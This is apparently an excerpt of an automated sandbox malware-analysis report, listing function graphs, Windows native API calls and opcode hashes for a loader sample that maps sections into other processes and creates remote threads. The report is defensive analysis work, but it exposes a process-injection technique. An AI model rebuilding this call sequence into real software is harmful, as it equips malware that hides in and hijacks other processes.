                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 0252024D
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2365221336.0000000002520000.00000040.00001000.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_2520000_esjbbri.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID: cess$kernel32.dll
                                                                        • API String ID: 4275171209-1230238691
                                                                        • Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                        • Instruction ID: 1e46428af89d03d9eea345c8977b0cf0df5e278e99040794962eefb35d28ee77
                                                                        • Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
                                                                        • Instruction Fuzzy Hash: 10525A75A01229DFDB64CF58C984BA8BBB1BF09314F1480D9E54DAB391DB30AA89CF14
                                                                        Function 026DF236 Relevance: 3.0, APIs: 2, Instructions: 41processCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 319 26df236-26df24f 320 26df251-26df253 319->320 321 26df25a-26df266 CreateToolhelp32Snapshot 320->321 322 26df255 320->322 323 26df268-26df26e 321->323 324 26df276-26df283 Module32First 321->324 322->321 323->324 329 26df270-26df274 323->329 325 26df28c-26df294 324->325 326 26df285-26df286 call 26deef5 324->326 330 26df28b 326->330 329->320 329->324 330->325
                                                                        APIs
                                                                        • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 026DF25E
                                                                        • Module32First.KERNEL32(00000000,00000224), ref: 026DF27E
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2365373242.00000000026CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 026CD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_26cd000_esjbbri.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                        • String ID:
                                                                        • API String ID: 3833638111-0
                                                                        • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                        • Instruction ID: 78c155dd277cf891eb976f98064f162a9f62f7d55eaf1d6d146468a18cfa4788
                                                                        • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                        • Instruction Fuzzy Hash: 19F096359007186FD7203BF9A8CDB6F76E8AF89625F100529E643D59C0DB70E8454AA1
                                                                        Function 02520E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 332 2520e0f-2520e24 SetErrorMode * 2 333 2520e26 332->333 334 2520e2b-2520e2c 332->334 333->334
                                                                        APIs
                                                                        • SetErrorMode.KERNELBASE(00000400,?,?,02520223,?,?), ref: 02520E19
                                                                        • SetErrorMode.KERNELBASE(00000000,?,?,02520223,?,?), ref: 02520E1E
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2365221336.0000000002520000.00000040.00001000.00020000.00000000.sdmp, Offset: 02520000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_2520000_esjbbri.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: ErrorMode
                                                                        • String ID:
                                                                        • API String ID: 2340568224-0
                                                                        • Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                        • Instruction ID: a45cf177f0ecddc54456e47d672fa3adceeee364b8599841ec49e672e1a97264
                                                                        • Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
                                                                        • Instruction Fuzzy Hash: E7D0123114512877D7002A94DC09BCD7F1CDF05B66F008011FB0DD90C0C770954046E9
                                                                        Function 004018E6 Relevance: 1.3, APIs: 1, Instructions: 63sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 335 4018e6-40194b call 401193 Sleep call 40141f 349 40195a-4019a5 call 401193 335->349 350 40194d-401955 call 401514 335->350 350->349
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2364093854.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_400000_esjbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                        • String ID:
                                                                        • API String ID: 1885482327-0
                                                                        • Opcode ID: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                        • Instruction ID: 08a90aa29aaa59261053d8f0d19a3ecdc4dd21bf61fce8c4d66a51d0c793aa75
                                                                        • Opcode Fuzzy Hash: a4b5604c3fad4e3a9f3f792e8fb47035b06f8c3694b385928224ebe720cba1b7
                                                                        • Instruction Fuzzy Hash: EB11A1F660C204FAEB106AA49C61E7A3318AB40754F304137F613790F5957D9A13F66F
                                                                        Function 00401915 Relevance: 1.3, APIs: 1, Instructions: 59sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 364 401915-401918 365 4018c6-4018c7 364->365 366 40191a-40194b call 401193 Sleep call 40141f 364->366 367 4018d7 365->367 368 4018ce-4018e3 call 401193 365->368 378 40195a-4019a5 call 401193 366->378 379 40194d-401955 call 401514 366->379 367->368 379->378
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2364093854.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_400000_esjbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                        • String ID:
                                                                        • API String ID: 1885482327-0
                                                                        • Opcode ID: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                        • Instruction ID: d2c64d108ecd7190b789ce3c9d4f03e3911909dfd4099b6475a4add21270c3a3
                                                                        • Opcode Fuzzy Hash: 7bb1df720b8f813faa3697c6259eeb6b3a5716e5c382bc39f4698e2c5426f3b5
                                                                        • Instruction Fuzzy Hash: 6D019EB7208208E6DB006AA5AC51ABA33189B44359F304537F723790F6D57D8612E72F
                                                                        Function 004018F1 Relevance: 1.3, APIs: 1, Instructions: 55sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 393 4018f1-40194b call 401193 Sleep call 40141f 403 40195a-4019a5 call 401193 393->403 404 40194d-401955 call 401514 393->404 404->403
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2364093854.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_400000_esjbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                        • String ID:
                                                                        • API String ID: 1885482327-0
                                                                        • Opcode ID: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                        • Instruction ID: b5ca90d31d4069b8fd1e735589466699ca1bb5e14181e618ca72d4e2f39bbf06
                                                                        • Opcode Fuzzy Hash: db3408315eb658ba3491db04f2d46bddbd6b336d8c43cf969156009dde905ade
                                                                        • Instruction Fuzzy Hash: D101D2B6608204EBDB019AF49C62A7A37549F44315F200137FA53790F1D67D8643E72F
                                                                        Function 00401912 Relevance: 1.3, APIs: 1, Instructions: 52sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 418 401912-40194b call 401193 Sleep call 40141f 429 40195a-4019a5 call 401193 418->429 430 40194d-401955 call 401514 418->430 430->429
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2364093854.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_400000_esjbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                        • String ID:
                                                                        • API String ID: 1885482327-0
                                                                        • Opcode ID: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                        • Instruction ID: 0621b20c29367ada74e4c9127c9a5516285bec5e68af8f441e6b7f153e3f788d
                                                                        • Opcode Fuzzy Hash: 7e129187160df36b360d42079074bb08fe8934bb284168352239ee73acaefb28
                                                                        • Instruction Fuzzy Hash: 11017CB560C204EAEB109AA49C61A7A3318AB44354F304537FA27790F5D67D9612E72F
                                                                        Function 026DEEF5 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 444 26deef5-26def2f call 26df208 447 26def7d 444->447 448 26def31-26def64 VirtualAlloc call 26def82 444->448 447->447 450 26def69-26def7b 448->450 450->447
                                                                        APIs
                                                                        • VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 026DEF46
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2365373242.00000000026CD000.00000040.00000020.00020000.00000000.sdmp, Offset: 026CD000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_26cd000_esjbbri.jbxd
                                                                        Yara matches
                                                                        Similarity
                                                                        • API ID: AllocVirtual
                                                                        • String ID:
                                                                        • API String ID: 4275171209-0
                                                                        • Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                        • Instruction ID: e67c518d724e1c1c32ca55d9673fa6b87e01bb27949707c0618f8dc84b153cd6
                                                                        • Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
                                                                        • Instruction Fuzzy Hash: 15113979A00208EFDB01DF98C985E99BFF5AF08350F0580A4F9489B361D371EA90EF80
                                                                        Function 00401925 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 451 401925-40194b call 401193 Sleep call 40141f 459 40195a-4019a5 call 401193 451->459 460 40194d-401955 call 401514 451->460 460->459
                                                                        APIs
                                                                        • Sleep.KERNELBASE(00001388), ref: 00401936
                                                                          • Part of subcall function 00401514: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 004015D3
                                                                          • Part of subcall function 00401514: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401600
                                                                          • Part of subcall function 00401514: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401623
                                                                        Memory Dump Source
                                                                        • Source File: 00000004.00000002.2364093854.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_4_2_400000_esjbbri.jbxd
                                                                        Similarity
                                                                        • API ID: Section$CreateDuplicateObjectSleepView
                                                                        • String ID:
                                                                        • API String ID: 1885482327-0
                                                                        • Opcode ID: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                        • Instruction ID: ea6e3854d66af35421fcd7571e0742f45a6e64d38424a4e1b6315f5079e28d0a
                                                                        • Opcode Fuzzy Hash: 2f4c2daa00eb47e2555f44135ed694f04ab08e7709eb0f7e86441ab925b63f7c
                                                                        • Instruction Fuzzy Hash: 28F08CB6208204EADB00AEA49C61EBA3318AB44314F304533FB23790F5C67D8612E72F

                                                                        Execution Graph

                                                                        Execution Coverage:6.3%
                                                                        Dynamic/Decrypted Code Coverage:43.3%
                                                                        Signature Coverage:0%
                                                                        Total number of Nodes:120
                                                                        Total number of Limit Nodes:4
                                                                        execution_graph 4212 267ed66 4213 267ed75 4212->4213 4216 267f506 4213->4216 4217 267f521 4216->4217 4218 267f52a CreateToolhelp32Snapshot 4217->4218 4219 267f546 Module32First 4217->4219 4218->4217 4218->4219 4220 267f555 4219->4220 4221 267ed7e 4219->4221 4223 267f1c5 4220->4223 4224 267f1f0 4223->4224 4225 267f201 VirtualAlloc 4224->4225 4226 267f239 4224->4226 4225->4226 4226->4226 4246 403043 4247 40319a 4246->4247 4248 40306d 4246->4248 4248->4247 4249 403128 RtlCreateUserThread NtTerminateProcess 4248->4249 4249->4247 4271 24e0005 4276 24e092b GetPEB 4271->4276 4273 24e0030 4278 24e003c 4273->4278 4277 24e0972 4276->4277 4277->4273 4279 24e0049 4278->4279 4280 24e0e0f 2 API calls 4279->4280 4281 24e0223 4280->4281 4282 24e0d90 GetPEB 4281->4282 4283 24e0238 VirtualAlloc 4282->4283 4284 24e0265 4283->4284 4285 24e02ce VirtualProtect 4284->4285 4287 24e030b 4285->4287 4286 24e0439 VirtualFree 4290 24e04be LoadLibraryA 4286->4290 4287->4286 4289 24e08c7 4290->4289 4291 24e0001 4292 24e0005 4291->4292 4293 24e092b GetPEB 4292->4293 4294 24e0030 4293->4294 4295 24e003c 7 API calls 4294->4295 4296 24e0038 4295->4296 4297 4014cf 4298 4014d3 4297->4298 4299 401660 NtDuplicateObject 4298->4299 4308 401571 4298->4308 4300 40167d NtCreateSection 4299->4300 4299->4308 4301 4016a3 NtMapViewOfSection 4300->4301 4302 4016fd NtCreateSection 4300->4302 4301->4302 4304 4016c6 NtMapViewOfSection 4301->4304 4303 401729 4302->4303 4302->4308 4306 401733 NtMapViewOfSection 4303->4306 4303->4308 4304->4302 4305 4016e4 4304->4305 4305->4302 4307 40175a NtMapViewOfSection 4306->4307 4306->4308 4307->4308 4410 4015d5 4411 4015e4 4410->4411 4412 401660 NtDuplicateObject 4411->4412 4416 40177c 4411->4416 4413 40167d NtCreateSection 4412->4413 4412->4416 4414 4016a3 NtMapViewOfSection 4413->4414 4415 4016fd NtCreateSection 4413->4415 4414->4415 4418 4016c6 NtMapViewOfSection 4414->4418 4415->4416 4417 401729 4415->4417 4417->4416 4420 401733 NtMapViewOfSection 4417->4420 4418->4415 4419 4016e4 4418->4419 4419->4415 4420->4416 4421 40175a NtMapViewOfSection 4420->4421 4421->4416 4250 402f16 4251 402f1a 4250->4251 4253 402fa2 4251->4253 4254 401991 4251->4254 4255 4019a0 4254->4255 4256 4019d8 Sleep 4255->4256 4258 4019f3 4256->4258 4259 4014c4 4256->4259 4258->4253 4260 4014d3 4259->4260 4261 401660 NtDuplicateObject 4260->4261 4270 401571 4260->4270 4262 40167d NtCreateSection 4261->4262 4261->4270 4263 4016a3 NtMapViewOfSection 4262->4263 4264 4016fd NtCreateSection 4262->4264 4263->4264 4266 4016c6 NtMapViewOfSection 4263->4266 4265 401729 4264->4265 4264->4270 4268 401733 NtMapViewOfSection 4265->4268 4265->4270 4266->4264 4267 4016e4 4266->4267 4267->4264 4269 40175a NtMapViewOfSection 4268->4269 4268->4270 4269->4270 4270->4258 4369 402e9a 4370 402e5f 4369->4370 4371 402eaf 4369->4371 4372 401991 8 API calls 4371->4372 4373 402fa2 4371->4373 4372->4373 4321 402ee7 4322 402ef9 4321->4322 4323 401991 8 API calls 4322->4323 4324 402fa2 4322->4324 4323->4324 4473 4019a9 4474 4019a0 4473->4474 4475 4019d8 Sleep 4474->4475 4476 4014c4 7 API calls 4475->4476 4477 4019f3 4475->4477 4476->4477 4227 24e003c 4228 24e0049 4227->4228 4240 24e0e0f SetErrorMode SetErrorMode 4228->4240 4233 24e0265 4234 24e02ce VirtualProtect 4233->4234 4236 24e030b 4234->4236 4235 24e0439 VirtualFree 4239 24e04be LoadLibraryA 4235->4239 4236->4235 4238 24e08c7 4239->4238 4241 24e0223 4240->4241 4242 24e0d90 4241->4242 4243 24e0dad 4242->4243 4244 24e0dbb GetPEB 4243->4244 4245 24e0238 VirtualAlloc 4243->4245 4244->4245 4245->4233 4374 401373 4375 401381 VirtualProtect 4374->4375 4377 40133e 4375->4377 4378 401975 4379 401979 4378->4379 4380 4014c4 7 API calls 4379->4380 4381 4019f3 4380->4381 4386 267ed58 4387 267ed66 4386->4387 4388 267f506 3 API calls 4387->4388 4389 267ed7e 4388->4389

                                                                        Executed Functions

                                                                        Function 004014C4 Relevance: 10.8, APIs: 7, Instructions: 277COMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 85 4014c4-4014f6 91 4014f9-40150d call 401240 85->91 96 401512-401513 91->96 97 401544-401545 96->97 98 401515-401528 96->98 100 401547 97->100 101 4015bd-4015d4 97->101 98->91 99 40152a-401535 98->99 99->96 105 401537-401543 99->105 102 401596-4015a6 100->102 103 401549-40154b 100->103 106 4015a8 102->106 103->106 107 40154d-40156d 103->107 105->97 109 4015e7-40160a call 401240 107->109 110 40156f 107->110 119 40160c 109->119 120 40160f-401614 109->120 112 401571 110->112 113 4015e2-4015e3 110->113 113->109 119->120 122 40161a-40162b 120->122 123 40193e-401946 120->123 126 401631-40165a 122->126 127 40193c 122->127 123->120 128 40194b-40198e call 401240 123->128 126->127 135 401660-401677 NtDuplicateObject 126->135 127->128 135->127 137 40167d-4016a1 NtCreateSection 135->137 139 4016a3-4016c4 NtMapViewOfSection 137->139 140 4016fd-401723 NtCreateSection 137->140 139->140 144 4016c6-4016e2 NtMapViewOfSection 139->144 140->127 143 401729-40172d 140->143 143->127 147 401733-401754 NtMapViewOfSection 143->147 144->140 146 4016e4-4016fa 144->146 146->140 147->127 149 40175a-401776 NtMapViewOfSection 147->149 149->127 152 40177c 149->152 152->127 153 40177c call 401781 152->153 153->127
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2653902687.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_E647.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: a4cfe7beb35eebf88c645a46c10bdf16ef044b5e65f6e3ad60f9fe20b10e07c2
                                                                        • Instruction ID: a2440897234d9063cbd2a71cb92c382042c3cd10596cdc4f18a7c269882a1901
                                                                        • Opcode Fuzzy Hash: a4cfe7beb35eebf88c645a46c10bdf16ef044b5e65f6e3ad60f9fe20b10e07c2
                                                                        • Instruction Fuzzy Hash: 0981D5B4504244FBDB208F95CC49FEB7BB8EF81740F20416BF902BA1E5D6749902DB66
                                                                        Function 004015D5 Relevance: 10.7, APIs: 7, Instructions: 166nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 154 4015d5-4015e4 156 4015f4 154->156 157 4015eb-4015f0 154->157 156->157 158 4015f7-40160a call 401240 156->158 157->158 161 40160c 158->161 162 40160f-401614 158->162 161->162 164 40161a-40162b 162->164 165 40193e-401946 162->165 168 401631-40165a 164->168 169 40193c 164->169 165->162 170 40194b-40198e call 401240 165->170 168->169 177 401660-401677 NtDuplicateObject 168->177 169->170 177->169 179 40167d-4016a1 NtCreateSection 177->179 181 4016a3-4016c4 NtMapViewOfSection 179->181 182 4016fd-401723 NtCreateSection 179->182 181->182 186 4016c6-4016e2 NtMapViewOfSection 181->186 182->169 185 401729-40172d 182->185 185->169 189 401733-401754 NtMapViewOfSection 185->189 186->182 188 4016e4-4016fa 186->188 188->182 189->169 191 40175a-401776 NtMapViewOfSection 189->191 191->169 194 40177c 191->194 194->169 195 40177c call 401781 194->195 195->169
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2653902687.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_E647.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: a048fff95c548b67d4af93e06dbb446bf3167c5580fcedad9e3c57286057ba63
                                                                        • Instruction ID: 5b275a0397ac31cab10c66c3112b8ecfdbc4447489e22d1c2cba3eb21d005058
                                                                        • Opcode Fuzzy Hash: a048fff95c548b67d4af93e06dbb446bf3167c5580fcedad9e3c57286057ba63
                                                                        • Instruction Fuzzy Hash: 8251F9B5900245BBEB208F91CC48FEF7BB8EF85710F10416AFA11BA2A5D7759941CB64
                                                                        Function 004015DF Relevance: 10.7, APIs: 7, Instructions: 164nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 196 4015df-4015e4 198 4015f4 196->198 199 4015eb-4015f0 196->199 198->199 200 4015f7-40160a call 401240 198->200 199->200 203 40160c 200->203 204 40160f-401614 200->204 203->204 206 40161a-40162b 204->206 207 40193e-401946 204->207 210 401631-40165a 206->210 211 40193c 206->211 207->204 212 40194b-40198e call 401240 207->212 210->211 219 401660-401677 NtDuplicateObject 210->219 211->212 219->211 221 40167d-4016a1 NtCreateSection 219->221 223 4016a3-4016c4 NtMapViewOfSection 221->223 224 4016fd-401723 NtCreateSection 221->224 223->224 228 4016c6-4016e2 NtMapViewOfSection 223->228 224->211 227 401729-40172d 224->227 227->211 231 401733-401754 NtMapViewOfSection 227->231 228->224 230 4016e4-4016fa 228->230 230->224 231->211 233 40175a-401776 NtMapViewOfSection 231->233 233->211 236 40177c 233->236 236->211 237 40177c call 401781 236->237 237->211
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2653902687.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_E647.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 7305ee3979d5b4667fc5844815bc59bb72ccff8572694ad63906bf8bfbab0545
                                                                        • Instruction ID: aa7ad941c6157971e71dc2736092b98b642c15495c2c07021be349f0f8194e9f
                                                                        • Opcode Fuzzy Hash: 7305ee3979d5b4667fc5844815bc59bb72ccff8572694ad63906bf8bfbab0545
                                                                        • Instruction Fuzzy Hash: 4D51FAB5900249BBEB208F91CC48FEF7BB8EF85710F10015AFA11BA2A5D7749945CB64
                                                                        Function 004015F2 Relevance: 10.7, APIs: 7, Instructions: 164nativeCOMMON
                                                                        Download Yara Rule

                                                                        Control-flow Graph

                                                                        • Executed
                                                                        • Not Executed
                                                                        control_flow_graph 238 4015f2-4015f4 240 4015f7-40160a call 401240 238->240 241 4015eb-4015f0 238->241 244 40160c 240->244 245 40160f-401614 240->245 241->240 244->245 247 40161a-40162b 245->247 248 40193e-401946 245->248 251 401631-40165a 247->251 252 40193c 247->252 248->245 253 40194b-40198e call 401240 248->253 251->252 260 401660-401677 NtDuplicateObject 251->260 252->253 260->252 262 40167d-4016a1 NtCreateSection 260->262 264 4016a3-4016c4 NtMapViewOfSection 262->264 265 4016fd-401723 NtCreateSection 262->265 264->265 269 4016c6-4016e2 NtMapViewOfSection 264->269 265->252 268 401729-40172d 265->268 268->252 272 401733-401754 NtMapViewOfSection 268->272 269->265 271 4016e4-4016fa 269->271 271->265 272->252 274 40175a-401776 NtMapViewOfSection 272->274 274->252 277 40177c 274->277 277->252 278 40177c call 401781 277->278 278->252
                                                                        APIs
                                                                        • NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 0040166F
                                                                        • NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 0040169C
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016BF
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016DD
                                                                        • NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 0040171E
                                                                        • NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 0040174F
                                                                        • NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 00401771
                                                                        Memory Dump Source
                                                                        • Source File: 00000006.00000002.2653902687.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_6_2_400000_E647.jbxd
                                                                        Similarity
                                                                        • API ID: Section$View$Create$DuplicateObject
                                                                        • String ID:
                                                                        • API String ID: 1546783058-0
                                                                        • Opcode ID: 6fcf8b22fbdcb8380d2881299c31f747d5ad1c4e66094b591aeffa0cf5ced54e
                                                                        • Instruction ID: 51677960ee3875d5e78d4b2c0b9a124aae989836c1cf5ff6a0c78d9f2f0b6c9a
                                                                        • Opcode Fuzzy Hash: 6fcf8b22fbdcb8380d2881299c31f747d5ad1c4e66094b591aeffa0cf5ced54e
